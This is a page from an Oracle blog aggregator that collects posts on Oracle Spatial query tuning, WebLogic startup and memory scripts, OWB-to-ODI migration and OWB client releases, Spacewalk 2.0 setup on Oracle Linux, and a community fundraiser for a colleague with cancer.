The logic I chose is simple, if sdo_num_res parameter is defined, get the number of records from the statistics available for the table and set the selectivity variable (sel) to (sdo_num_res/num_rows)*100.

Let's see how it works:


SQL> EXPLAIN PLAN FOR
2 SELECT t1.id, t2.id, t2.restaurants_id, t2.item_number
3 FROM restaurants t1
4 , menu_items t2
5 WHERE t1.id=t2.restaurants_id
6 AND SDO_NN(t1.point,
7 SDO_GEOMETRY(
8 2001 -- 2 dimensional point
9 , null
10 , SDO_POINT_TYPE(10,0,null)
11 , null
12 , null
13 ),
14 'sdo_num_res=5',
15 1
16 )='TRUE'
17* ORDER BY t1.id, t2.item_number
SQL> /

Explained.

SQL> set line 200 pagesize 9999
SQL> SELECT * FROM table(DBMS_XPLAN.DISPLAY);

PLAN_TABLE_OUTPUT
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Plan hash value: 2341889131

------------------------------------------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
------------------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 25 | 1000 | 36 (3)| 00:00:01 |
| 1 | SORT ORDER BY | | 25 | 1000 | 36 (3)| 00:00:01 |
| 2 | NESTED LOOPS | | 25 | 1000 | 35 (0)| 00:00:01 |
| 3 | TABLE ACCESS BY INDEX ROWID| RESTAURANTS | 5 | 80 | 0 (0)| 00:00:01 |
|* 4 | DOMAIN INDEX | RESTAURANTS_SIDX | | | 0 (0)| 00:00:01 |
| 5 | TABLE ACCESS BY INDEX ROWID| MENU_ITEMS | 5 | 120 | 7 (0)| 00:00:01 |
|* 6 | INDEX RANGE SCAN | MENU_ITEMS_RESTAURANTS_IDX | 5 | | 2 (0)| 00:00:01 |
------------------------------------------------------------------------------------------------------------

Predicate Information (identified by operation id):
---------------------------------------------------

4 - access("MDSYS"."SDO_NN"("T1"."POINT","MDSYS"."SDO_GEOMETRY"(2001,NULL,"SDO_POINT_TYPE"(10,0,N
ULL),NULL,NULL),'sdo_num_res=5',1)='TRUE')
6 - access("T1"."ID"="T2"."RESTAURANTS_ID")

20 rows selected.


As you can see the cardinality is correctly calculated which resulted CBO to produce better execution plan. With this plan in place, the query completes in less than 1 cs.

If you look into 10053 trace file you can also see that the calculated selectivity is 0.001%:




MDSYS.SDO_STATISTICS_CUSTOM.ODCIStatsFunctionCost returned:
CPUCost : 10000
IOCost : 10000
NetworkCost : 10000
Calling user-defined selectivity function...
predicate: "MDSYS"."SDO_NN"("T1"."POINT","MDSYS"."SDO_GEOMETRY"(2001,NULL,"SDO_POINT_TYPE"(10,0,NULL),NULL,NULL),'sdo_num_res=5',1)='TRUE'
declare
sel number;
obj0 "MDSYS"."SDO_GEOMETRY" := "MDSYS"."SDO_GEOMETRY"(NULL, NULL, NULL, NULL, NULL);

begin
:1 := "MDSYS"."SDO_STATISTICS_CUSTOM".ODCIStatsSelectivity(
sys.ODCIPREDINFO('MDSYS',
'PRVT_IDX',
'NN',
45),
sel,
sys.ODCIARGDESCLIST(sys.ODCIARGDESC(3, NULL, NULL, NULL, NULL, NULL, NULL), sys.ODCIARGDESC(3, NULL, NULL, NULL, NULL, NULL, NULL), sys.ODCIARGDESC(2, 'RESTAURANTS', 'TEST', '"POINT"', NULL, NULL, NULL), sys.ODCIARGDESC(3, NULL, NULL, NULL, NULL, NULL, NULL), sys.ODCIARGDESC(3, NULL, NULL, NULL, NULL, NULL, NULL)),
:3,
:4
, obj0, "MDSYS"."SDO_GEOMETRY"(2001,NULL,"SDO_POINT_TYPE"(10,0,NULL),NULL,NULL), :5,
sys.ODCIENV(:6,:7,:8,:9));
if sel IS NULL then
:2 := -1.0;
else
:2 := sel;
end if;
exception
when others then
raise;
end;
Bind :3 Value 'TRUE'
Bind :4 Value 'TRUE'
Bind :5 Value 'sdo_num_res=5'
ODCIEnv Bind :6 Value 0
ODCIEnv Bind :7 Value 0
ODCIEnv Bind :8 Value 0
ODCIEnv Bind :9 Value 3
MDSYS.SDO_STATISTICS_CUSTOM.ODCIStatsSelectivity returned selectivity: 0.00100000%


Anyway, since the current implementation of SDO_STATISTICS type returns selectivity of 1%, the next logical question is what one can do in order to workaround the problem.

Workaround

The problem can be addressed by providing CBO that extra bit of information, that is how many rows we expect to get back after applying SDO_NN operator. In order to do this one could consider using the cardinality hint or rewrite the query and add one more predicate ROWNUM<=5 that would tell CBO how many rows we are expecting to select from RESTAURANTS table. (there may be other strategies available too)

Use cardinality hint:

SELECT /*+ cardinality(t1 5) gather_plan_statistics */ t1.id, t2.id, t2.restaurants_id, t2.item_number
FROM restaurants t1
, menu_items t2
WHERE t1.id=t2.restaurants_id
AND SDO_NN(t1.point,
SDO_GEOMETRY(
2001 -- 2 dimensional point
, null
, SDO_POINT_TYPE(10,0,null)
, null
, null
),
'sdo_num_res=5',
1
)='TRUE'
ORDER BY t1.id, t2.item_number;


The execution statistics in this case look like:

Plan hash value: 2341889131


PLAN_TABLE_OUTPUT
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers | Reads | OMem | 1Mem | Used-Mem |
----------------------------------------------------------------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 25 |00:00:00.01 | 92 | 5 | | | |
| 1 | SORT ORDER BY | | 1 | 25 | 25 |00:00:00.01 | 92 | 5 | 2048 | 2048 | 2048 (0)|
| 2 | NESTED LOOPS | | 1 | 25 | 25 |00:00:00.01 | 92 | 5 | | | |
| 3 | TABLE ACCESS BY INDEX ROWID| RESTAURANTS | 1 | 5 | 5 |00:00:00.01 | 55 | 0 | | | |
|* 4 | DOMAIN INDEX | RESTAURANTS_SIDX | 1 | | 5 |00:00:00.01 | 54 | 0 | | | |
| 5 | TABLE ACCESS BY INDEX ROWID| MENU_ITEMS | 5 | 5 | 25 |00:00:00.01 | 37 | 5 | | | |
|* 6 | INDEX RANGE SCAN | MENU_ITEMS_RESTAURANTS_IDX | 5 | 5 | 25 |00:00:00.01 | 12 | 0 | | | |
----------------------------------------------------------------------------------------------------------------------------------------------------------

PLAN_TABLE_OUTPUT
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Predicate Information (identified by operation id):
---------------------------------------------------

4 - access("MDSYS"."SDO_NN"("T1"."POINT","MDSYS"."SDO_GEOMETRY"(2001,NULL,"SDO_POINT_TYPE"(10,0,NULL),NULL,NULL),'sdo_num_res=5',1)='TRUE')
6 - access("T1"."ID"="T2"."RESTAURANTS_ID")


29 rows selected.


Rewrite the query and use ROWNUM<=n predicate where n is the number associated with sdo_num_rows parameter:

SELECT /*+ gather_plan_statistics */ t1.id, t2.id, t2.restaurants_id, t2.item_number
FROM (SELECT *
FROM restaurants
WHERE
SDO_NN(point,
SDO_GEOMETRY(
2001 -- 2 dimensional point
, null
, SDO_POINT_TYPE(10,0,null)
, null
, null
),
'sdo_num_res=5',
1
)='TRUE'
AND rownum<=5
) t1
, menu_items t2
WHERE t1.id=t2.restaurants_id
ORDER BY t1.id, t2.item_number;


… and the execution statistics :

Plan hash value: 3570932640

----------------------------------------------------------------------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers | OMem | 1Mem | Used-Mem |
----------------------------------------------------------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 25 |00:00:00.01 | 101 | | | |
| 1 | SORT ORDER BY | | 1 | 25 | 25 |00:00:00.01 | 101 | 2048 | 2048 | 2048 (0)|
| 2 | NESTED LOOPS | | 1 | | 25 |00:00:00.01 | 101 | | | |
| 3 | NESTED LOOPS | | 1 | 25 | 25 |00:00:00.01 | 76 | | | |
| 4 | VIEW | | 1 | 5 | 5 |00:00:00.01 | 64 | | | |
|* 5 | COUNT STOPKEY | | 1 | | 5 |00:00:00.01 | 64 | | | |
| 6 | TABLE ACCESS BY INDEX ROWID| RESTAURANTS | 1 | 5 | 5 |00:00:00.01 | 64 | | | |
|* 7 | DOMAIN INDEX | RESTAURANTS_SIDX | 1 | | 5 |00:00:00.01 | 63 | | | |
|* 8 | INDEX RANGE SCAN | MENU_ITEMS_RESTAURANTS_IDX | 5 | 5 | 25 |00:00:00.01 | 12 | | | |
| 9 | TABLE ACCESS BY INDEX ROWID | MENU_ITEMS | 25 | 5 | 25 |00:00:00.01 | 25 | | | |
----------------------------------------------------------------------------------------------------------------------------------------------------

Predicate Information (identified by operation id):
---------------------------------------------------

5 - filter(ROWNUM<=5)
7 - access("MDSYS"."SDO_NN"("POINT","MDSYS"."SDO_GEOMETRY"(2001,NULL,"SDO_POINT_TYPE"(10,0,NULL),NULL,NULL),'sdo_num_res=5',1)='TRUE')
8 - access("T1"."ID"="T2"."RESTAURANTS_ID")


34 rows selected.


As you can see, Oracle CBO made correct cardinality estimates in the last two examples and used NESTED LOOPS method to join both tables that resulted with performance improvement.

I hope you got some valuable information out of this post.

Postscript on Scripts

Antony Reynolds - Fri, 2013-11-15 17:07
More Scripts for SOA Suite

Over time I have evolved my startup scripts and thought it would be a good time to share them.  They are available for download here.  I have finally converted to using WLST, which has a number of advantages.  To me the biggest advantage is that the output and log files are automatically written to a consistent location in the domain directory or node manager directory.  In addition the WLST scripts wait for the component to start and then return, this lets us string commands together without worrying about the dependencies.

The following are the key scripts (available for download here):

Script Description Pre-Reqs Stops when
Task Complete startWlstNodeManager.sh Starts Node Manager using WLST None Yes startNodeManager.sh Starts Node Manager None Yes stopNodeManager.sh Stops Node Manager using WLST Node Manager running Yes startWlstAdminServer.sh Starts Admin Server using WLST Node Manager running Yes startAdminServer.sh Starts Admin Server None No stopAdminServer.sh Stops Admin Server Admin Server running Yes startWlstManagedServer.sh Starts Managed Server using WLST Node Manager running Yes startManagedServer.sh Starts Managed Server None No stopManagedServer.sh Stops Managed Server Admin Server running Yes Samples

To start Node Manager and Admin Server

startWlstNodeManager.sh ; startWlstAdminServer.sh

To start Node Manager, Admin Server and SOA Server

startWlstNodeManager.sh ; startWlstAdminServer.sh ; startWlstManagedServer soa_server1

Note that the Admin server is not started until the Node Manager is running, similarly the SOA server is not started until the Admin server is running.

Node Manager Scripts startWlstNodeManager.sh

Uses WLST to start the Node Manager.  When the script completes the Node manager will be running.

startNodeManager.sh

The Node Manager is started in the background and the output is piped to the screen. This causes the Node Manager to continue running in the background if the terminal is closed. Log files, including a .out capturing standard output and standard error, are placed in the <WL_HOME>/common/nodemanager directory, making them easy to find. This script pipes the output of the log file to the screen and keeps doing this until terminated, Terminating the script does not terminate the Node Manager.

stopNodeManager.sh

Uses WLST to stop the Node Manager.  When the script completes the Node manager will be stopped.

Admin Server Scripts startWlstAdminServer.sh

Uses WLST to start the Admin Server.  The Node Manager must be running before executing this command.  When the script completes the Admin Server will be running.

startAdminServer.sh

The Admin Server is started in the background and the output is piped to the screen. This causes the Admin Server to continue running in the background if the terminal is closed.  Log files, including the .out capturing standard output and standard error, are placed in the same location as if the server had been started by Node Manager, making them easy to find.  This script pipes the output of the log file to the screen and keeps doing this until terminated,  Terminating the script does not terminate the server.

stopAdminServer.sh

Stops the Admin Server.  When the script completes the Admin Server will no longer be running.

Managed Server Scripts startWlstManagedServer.sh <MANAGED_SERVER_NAME>

Uses WLST to start the given Managed Server. The Node Manager must be running before executing this command. When the script completes the given Managed Server will be running.

startManagedServer.sh <MANAGED_SERVER_NAME>

The given Managed Server is started in the background and the output is piped to the screen. This causes the given Managed Server to continue running in the background if the terminal is closed. Log files, including the .out capturing standard output and standard error, are placed in the same location as if the server had been started by Node Manager, making them easy to find. This script pipes the output of the log file to the screen and keeps doing this until terminated, Terminating the script does not terminate the server.

stopManagedServer.sh <MANAGED_SERVER_NAME>

Stops the given Managed Server. When the script completes the given Managed Server will no longer be running.

Utility Scripts

The following scripts are not called directly but are used by the previous scripts.

_fmwenv.sh

This script is used to provide information about the Node Manager and WebLogic Domain and must be edited to reflect the installed FMW environment, in particular the following values must be set:

  • DOMAIN_NAME – the WebLogic domain name.
  • NM_USERNAME – the Node Manager username.
  • NM_PASSWORD – the Node Manager password.
  • MW_HOME – the location where WebLogic and other FMW components are installed.
  • WEBLOGIC_USERNAME – the WebLogic Administrator username.
  • WEBLOGIC_PASSWORD - the WebLogic Administrator password.

The following values may also need changing:

  • ADMIN_HOSTNAME – the server where AdminServer is running.
  • ADMIN_PORT – the port number of the AdminServer.
  • DOMAIN_HOME – the location of the WebLogic domain directory, defaults to ${MW_HOME}/user_projects/domains/${DOMAIN_NAME}
  • NM_LISTEN_HOST – the Node Manager listening hostname, defaults to the hostname of the machine it is running on.
  • NM_LISTEN_PORT – the Node Manager listening port.
_runWLst.sh

This script runs the WLST script passed in environment variable ${SCRIPT} and takes its configuration from _fmwenv.sh.  It dynamically builds a WLST properties file in the /tmp directory to pass parameters into the scripts.  The properties filename is of the form <DOMAIN_NAME>.<PID>.properties.

_runAndLog.sh

This script runs the command passed in as an argument, writing standard out and standard error to a log file.  The log file is rotated between invocations to avoid losing the previous log files.  The log file is then tailed and output to the screen.  This means that this script will never finish by itself.

WLST Scripts

The following WLST scripts are used by the scripts above, taking their properties from /tmp/<DOMAIN_NAME>.<PID>.properties:

  • startNodeManager.py
  • stopNodeManager.py
  • startServer.py
  • startServerNM.py
Relationships

The dependencies and relationships between my scripts and the built in scripts are shown in the diagram below.

Thanks for the Memory

Antony Reynolds - Fri, 2013-11-15 15:28
Controlling Memory in Oracle SOA Suite

Within WebLogic you can specify the memory to be used by each managed server in the WebLogic console.  Unfortunately if you create a domain with Oracle SOA Suite it adds a new config script, setSOADomainEnv.sh, that overwrites any USER_MEM_ARGS passed in to the start scripts.  setDomainEnv.sh only sets a single set of memory arguments that are used by all servers, so an admin server gets the same memory parameters as a BAM server.  This means some servers will have more memory than they need and others will be too tightly constrained.  This is a bad thing.

A Solution

To overcome this I wrote a small script, setMem.sh, that checks to see which server is being started and then sets the memory accordingly.  It supports up to 9 different server types, each identified by a prefix.  If the prefix matches then the max and min heap and max and min perm gen are set.  Settings are controlled through variables set in the script,  If using JRockit then leave the PERM settings empty and they will not be set.

SRV1_PREFIX=Admin
SRV1_MINHEAP=768m
SRV1_MAXHEAP=1280m
SRV1_MINPERM=256m
SRV1_MAXPERM=512m

The above settings match any server whose name starts Admin.  The above will result in the following USER_MEM_ARGS value

USER_MEM_ARGS=-Xms768m -Xmx1280m -XX:PermSize=256m -XX:MaxPermSize=512m

If the prefix were soa then it would match soa_server1, soa_server2 etc.

There is a set of DEFAULT_ values that allow you to default the memory settings and only set them explicitly for servers that have settings different from your default.  Note that there must still be a matching prefix, otherwise the USER_MEM_ARGS will be the ones from setSOADomainEnv.sh.

This script needs to be called from the setDomainEnv.sh.  Add the call immediately before the following lines:

if [ "${USER_MEM_ARGS}" != "" ] ; then
        MEM_ARGS="${USER_MEM_ARGS}"
        export MEM_ARGS
fi

The script can be downloaded here.

Thoughts on Memory Setting

I know conventional wisdom is that Xms (initial heap size) and Xmx (max heap size) should be set the same to avoid needing to allocate memory after startup.  However I don’t agree with this.  Setting Xms==Xmx works great if you are omniscient, I don’t claim to be omniscient, my omni is a little limited, so I prefer to set Xms to what I think the server needs, this is what I would set it to if I was setting the parameters to be Xms=Xmx.  However I like to then set Xmx to be a little higher than I think the server needs.  This allows me to get the memory requirement wrong and not have my server fail due to out of memory.  In addition I can now monitor the server and if the heap memory usage goes above my Xms setting I know that I calculated wrong and I can change the Xms setting and restart the servers at a suitable time.  Setting them not equal buys be time to fix increased memory needs, for exampl edue to change in usage patterns or new functionality, it also allows me to be less than omniscient.

ps Please don’t tell my children I am not omniscient!

OWB to ODI Migration Utility released.

Antonio Romero - Fri, 2013-11-15 14:30

The much awaited OWB to ODI Migration utility has been released.

The migration utility is a command-line tool that enables you to migrate design-time metadata from OWB 11.2.0.4 to ODI 12c. The migration utility is provided in patch number 17547241 for your OWB 11gR2 (11.2.0.4) installation.

Migration is supported on Linux 64-bit x86 systems only. Before migrating, ensure that the following requirements are met:

  • OWB 11.2.0.4 installed (OWB 11.2.0.4 plus patch number 17547241)

  • ODI 12.1.2.0.0 installed (ODI 12.1.2.0.0 plus patch number 17053768)

ODI is Oracle's strategic product for heterogeneous data integration. Because many Oracle Database customers have significant investment in OWB, Oracle supports a phased migration from OWB 11gR2 (11.2.0.4) to ODI 12c (12.1.2).

  • ODI 12c supports an easier mapping between OWB 11gR2 concepts and objects and their ODI 12c counterparts. A migration utility is provided that automatically translates many OWB objects and mappings into their ODI equivalents. More information about the migration utility is here

http://docs.oracle.com/middleware/1212/odi/ODIMG/index.html

In addition to enabling the migration, the ODI 12c patch also comes with
new  components such as Pivot, Unpivot, Subquery filter  and Table Functions.
They're documented in the following appendix:
http://docs.oracle.com/middleware/1212/odi/ODIDG/app_12c_patch.htm


OWB to ODI Migration Utility released.

Antonio Romero - Fri, 2013-11-15 14:30

The much awaited OWB to ODI Migration utility has been released.

The migration utility is a command-line tool that enables you to migrate design-time metadata from OWB 11.2.0.4 to ODI 12c. The migration utility is provided in patch number 17547241 for your OWB 11gR2 (11.2.0.4) installation.

Migration is supported on Linux 64-bit x86 systems only. Before migrating, ensure that the following requirements are met:

  • OWB 11.2.0.4 installed (OWB 11.2.0.4 plus patch number 17547241)

  • ODI 12.1.2.0.0 installed (ODI 12.1.2.0.0 plus patch number 17053768)

ODI is Oracle's strategic product for heterogeneous data integration. Because many Oracle Database customers have significant investment in OWB, Oracle supports a phased migration from OWB 11gR2 (11.2.0.4) to ODI 12c (12.1.2).

  • ODI 12c supports an easier mapping between OWB 11gR2 concepts and objects and their ODI 12c counterparts. A migration utility is provided that automatically translates many OWB objects and mappings into their ODI equivalents. More information about the migration utility is here

http://docs.oracle.com/middleware/1212/odi/ODIMG/index.html

In addition to enabling the migration, the ODI 12c patch also comes with
new  components such as Pivot, Unpivot, Subquery filter  and Table Functions.
They're documented in the following appendix:
http://docs.oracle.com/middleware/1212/odi/ODIDG/app_12c_patch.htm


The Riley Family, Part II

Chet Justice - Tue, 2013-11-12 22:13
You didn't miss Part I, at least not here you didn't.

Many of you know Mike Riley. If you don't, here's a little history. He's the past president of ODTUG (for like 37 years or something) and for the last two years, he's served as Conference Chair for Kscope. Yeah, that doesn't really follow, but you know I'm a bit...scattered.

Did you read the link above? OK, well, here's the skinny. Mike has rectal cancer. Stage III. If it weren't for the stupid cancer part, the jokes would abound. Oh wait, they do anyway. Mike was diagnosed shortly after #kscope13, right around his 50th birthday (Happy Birthday Mike, Love, Cancer!). Ugh. (I want to say, "are you shittin' me?" see what I mean about the jokes? I can't help myself, I'm 14). Needless to say, cancer isn't really a joke. We all know someone affected by it. It is...well, it's not fun.

Go read his post if you haven't already. I'm going to give my version of that story. I'll wait...

So, Sunday morning, Game 3 of the World Series went to the Cardinals in a very bizarre way. I was watching highlights that morning as I had missed the end of the game (doesn't everyone know that I'm old and can't stay up that late to watch baseball?). Highlights. Mike lives in St. Louis. He's a Cardinal's fan. Wouldn't it be cool if he and his family could go to the game (mostly just his family, I don't like Mike that much). So I make some phone calls to see what people think of my idea. My idea is met with resistance. OK, I'll skip the people. Let's call Lisa (Mike's wife).

Apparently Sunday's are technology free days in the Riley household, no response. I go for a bike ride, but I take my phone, just in case Lisa calls me back. After the halfway point, my phone rings, I jump off the bike to answer.

So I talked to Lisa about my idea, can Mike handle the chaos of a World Series game?

We hang up and she goes to work. BTW, I asked her to keep my name out of it, but she didn't. We'll have words about that in the future.

She calls back (I think, it may have been over text, 2 weeks is an eternity to me). "He doesn't think he can do it."

So I call Mike directly (Lisa had already spoiled the surprise.)

"What about Box seats? You know, where the people with top hats and monocles sit? Away from the rift-raft, much more comfortable and free food and beer."

Backstory. Mike had finished his first round of chemo less than a week before Sunday. To make things worse, he decided it was a good time to throw out his back. He wasn't in the best of shape.

Mike said he thought he could do it.

OK, nay-sayers aside, let's see what we can do. I emailed approximately 50 people, mostly ODTUG people; board members, content leads, anyone I had in my address book. "Hey, wouldn't it be great to send Mike and his family to Game 5 of the World Series? We need to do this quick, tickets will probably double in price tonight especially if the Cardinals win." (that would mean Game 5 would be a clincher for the Cardinals, at home, muy expensive).

Within about 20 minutes, a couple of people pledged $600.

Holy shit!

At the prices I had seen, I was hoping to get between $50 and $100 from 50 people, hoping. I had $600 already. Game starts. Now it's up to $1100 in pledges. Holy shit, Part II. This might just be possible. Another 30 minutes and were about an hour into Game 4. Ticket prices have already gone up by $250 a ticket. Given that maybe 4 people have responded and I have $1600 in pledges, I pull the trigger. I bought 4 box seat tickets for the Riley family. (I had to have a couple of beers because I was about to drop a significant chunk of change without actual cash in hand, I could be out a lot of money, liquid courage is awesome).

Tickets sent to the Riley family. Pretty good feeling.

Like I said, I was confident, but I was scared. Before the end of the night though, there was over $5K pledged to get Mike and family to Game 5. Holy shit, Part III.

By midday Monday, pledges were well over $7K. I'll refer you back to Mike's post for more details. Shorter: jerseys for the family and a limo to the game.

Here's the breakdown: 35 people pledged, and paid, $8,080. Holy shit, Part IV. Average donation was $230.86. Median was $200. Low was $30 and high was $1000. Six people gave $500 or more. Nineteen people gave $200 or more. The list is a veritable Who's Who in the Oracle community.

Tickets + Jerseys + Limo = $6027.76

Riley family memory = Priceless.

So, what happened to the rest? Well, they have bills. Lots of bills. With the remainder, $2052.24, we paid off some hospital bills of $1220.63. There is currently $831.61 that will be sent shortly. It doesn't stop there though. Cancer treatment is effing expensive. Mike has surgery in December. He'll be on bed rest for some time. His bed is 17 years old. He needs a new one. After that, more chemo and more bills.

"Hey Chet, I'd love to help the Riley family out, can I give you my money for them?"

Yes, absolutely. Help me help them. I started a GoFundMe campaign. Goal is $10K. Any and all donations are welcome. Gifts include a thank you card from the Riley family and the knowledge that you helped out a fellow Oracle (nerd, definitely a nerd) in need. You can find the campaign here.

If you can't donate money, I've also created a hashtag so that we can show support for Mike and his family. It's #fmcuta (I'll let you figure out what it means). Words of encouragement are welcome and appreciated.

Thank you to the 35 who have already so generously given. Thank you to the rest of you who will donate or send out (rude) tweets.
Categories: BI & Warehousing

Spacewalk 2.0 provided to manage Oracle Linux systems

Wim Coekaerts - Mon, 2013-11-11 15:33
Oracle Linux customers have a few options to manage and provision their servers. We provide a license to use Oracle Enterprise Manager's Linux OS management, monitoring and provisioning features without additional cost for every server that has an Oracle Linux support subscription. So there is no additional pack to license and no additional per server cost, it's all included in our Basic, Premier and Systems support subscriptions. The nice thing with Oracle Enterprise Manager is that you end up with a single management product that can manage all aspects of your software stack. You have complete insight into the applications running, you have roles and responsibilities, you have third party connectors for storage or other products and it makes it very easy and convenient to correlate data and events when something happens. If you use Oracle VM as well, you end up with a complete cloud portal with selfservice, chargeback, etc...

Another, much simpler option, is just using yum. It is very easy to take a server and create directories and expose these through apache as repositories. You can have a simple yum config on each server pointing to a few specific repositories. It requires some manual effort in terms of creating directories, downloading packages and creating local repo files but it's easy to do and for many people a preferred solution.

There are also a good number of customers that just connect their servers directly to ULN or to our free update server public-yum. Just to re-iterate, our public-yum servers have all the errata and updates available for free.

Now we added another option. Many of our customers have switched from a competing Linux vendor and they had familiarity with their management tools. Switching to Oracle for support is very easy since we don't require changes to the installed servers but we also want to make sure there is a very easy and almost transparent switch for the management tools as well. While Oracle Enterprise Manager is our preferred way of managing systems, we now are offering Spacewalk 2.0 to our customers. The community project can be found here. We have made a few changes to ensure easy and complete support for Oracle Linux, tested it with public-yum, etc.. You can find the rpms in our public-yum repos at http://public-yum.oracle.com/repo/OracleLinux/OL6/. There are repositories for spacewalk server and then for each version (OL5,OL6) and architecture (x86 and x86-64) we have the client repositories as well. Spacewalk itself is only made available for OL6 x86-64.

Documentation can be found here.

I set it up myself and here are some quick steps on how you can get going in just a matter of minutes:

Spacewalk Server Installation :

1) Installing an Oracle Database

Use an existing Oracle Database or install a new Oracle Database (Standard or Enterprise Edition) [at this time use 11g, we will add support for 12c in the near future]. This database can be installed on the spacewalk server or on a separate remote server.

While Oracle XE might work to create a small sample POC, we do not support the use of Oracle XE, spacewalk repositories can become large and create a significant database workload.

Customers can use their existing database licenses, they can download the database with a trial licence from http://edelivery.oracle.com or Oracle Linux subscribers (customers) will be allowed to use the Oracle Database as a spacewalk repository as part of their Oracle Linux subscription at no additional cost.

|NOTE : spacewalk requires the database to be configured with the UTF8 characterset.
|Installation will fail if your database does not use UTF8.
|To verify if your database is configured correctly, run the following command in sqlplus:
|
|select value from nls_database_parameters where parameter='NLS_CHARACTERSET';
|This should return 'AL32UTF8'

2) Configure the database schema for spacewalk

Ideally, create a tablespace in the database to hold the spacewalk schema tables/data;

create tablespace spacewalk datafile '/u01/app/oracle/oradata/orcl/spacewalk.dbf'
 size 10G autoextend on;

Create the database user spacewalk (or use some other schema name) in sqlplus.

example :

 create user spacewalk identified by spacewalk;
 grant connect, resource to spacewalk;
 grant create table, create trigger, create synonym, create view, 
 alter session to spacewalk;
 grant unlimited tablespace to spacewalk;
 alter user spacewalk default tablespace spacewalk;

4) Spacewalk installation and configuration

Spacewalk server requires an Oracle Linux 6 x86-64 system. Clients can be Oracle Linux 5 or 6, both 32- and 64bit. The server is only supported on OL6/64bit.

The easiest way to get started is to do a 'Minimal' install of Oracle Linux on a server and configure the yum repository to include the spacewalk repo from public-yum.

Once you have a system with a minimal install, modify your yum repo to include the spacewalk repo.

Example :

edit /etc/yum.repos.d/public-yum-ol.repo and add the following lines at the end of the file :

[spacewalk]
name=spacewalk
baseurl=http://public-yum.oracle.com/repo/OracleLinux/OL6/spacewalk20/server/$basearch/
gpgkey=http://public-yum.oracle.com/RPM-GPG-KEY-oracle-ol6
gpgcheck=1
enabled=1

Install the following pre-requisite packages on your spacewalk server :

oracle-instantclient11.2-basic-11.2.0.3.0-1.x86_64
oracle-instantclient11.2-sqlplus-11.2.0.3.0-1.x86_64

rpm -ivh oracle-instantclient11.2-basic-11.2.0.3.0-1.x86_64 
rpm -ivh oracle-instantclient11.2-sqlplus-11.2.0.3.0-1.x86_64
The above RPMs can be found on the Oracle Technology Network website :
http://www.oracle.com/technetwork/topics/linuxx86-64soft-092277.html

As the root user, configure the library path to include the Oracle Instant Client libraries :

cd /etc/ld.so.conf.d
echo /usr/lib/oracle/11.2/client64/lib > oracle-instantclient11.2.conf
ldconfig

Install spacewalk :

# yum install spacewalk-oracle
The above yum command should download and install all required packages to run spacewalk on your local server.

| NOTE : if you did a full, desktop or workstation installation, 
| you have to remove the JTA package
| BEFORE installing spacewalk-oracle (rpm -e --nodeps jta)

Once the installation completes, simply run the spacewalk configuration tool and you are all set. (make sure to run the command with the 2 arguments)

spacewalk-setup --disconnected --external-db

Answer the questions during the setup, ensure you provide the current database user (example : spacewalk) and password (example : spacewalk) and database server hostname (the standard hostname of the server on which you have deployed the Oracle database)

At the end of the setup script, your spacewalk server should be fully configured and you can log into the web portal. Use your favorite browser to connect to the website : http://[spacewalkserverhostname]

The very first action will be to create the main admin account.

OWB - 11.2.0.4 Windows standalone client released

Antonio Romero - Wed, 2013-11-06 13:37

The 11.2.0.4 release of OWB containing the 32 bit and 64 bit standalone Windows client is released today, I had previously blogged about the Linux standalone client here. Big thanks to Anil for spearheading that, another milestone on the Data Integration roadmap.

Below are the patch numbers;

  • 17743124- OWB 11.2.0.4 STANDALONE CLIENT FOR Windows 64 BIT
  • 17743119 - OWB 11.2.0.4 STANDALONE CLIENT FOR Windows 32 BIT

This is the terminal release of OWB and customer bugs will be resolved on top of this release. We are excited to share information on the Oracle Data Integration 12c release in our upcoming launch video webcast on November 12th.

Pages

Subscribe to Oracle FAQ aggregator